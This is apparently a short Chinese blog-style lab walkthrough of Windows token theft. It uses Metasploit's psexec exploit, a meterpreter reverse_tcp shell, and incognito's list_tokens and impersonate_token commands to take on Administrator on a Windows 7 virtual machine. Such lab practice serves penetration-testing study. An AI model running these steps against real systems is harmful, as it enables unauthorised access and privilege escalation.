令牌窃取

1、(开启一台parrot虚拟机和Windows7)进入msfconsol,使用模块use exploit /windows/smb/psexec
2,设置目标ip运行报错“login failed”时需要设置用户和密码。在这里插入图片描述
3、在此处发生报错,设置payloadset payload windows/meterpreter/reverse_tcp

在这里插入图片描述

在这里插入图片描述

4.报错后设置目标IP为172.27.248.90输入172后tap就行了

在这里插入图片描述

5,获取到shell后getuid查看权限,首先输入use incognito,然后输入list_tokens -u列出可用的令牌。

在这里插入图片描述

在incognito调用impersonate_token假冒Administrator用户进行渗透测试.注意此处是两个反斜杠

在这里插入图片描述

执行shell命令并输入“whoami”

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值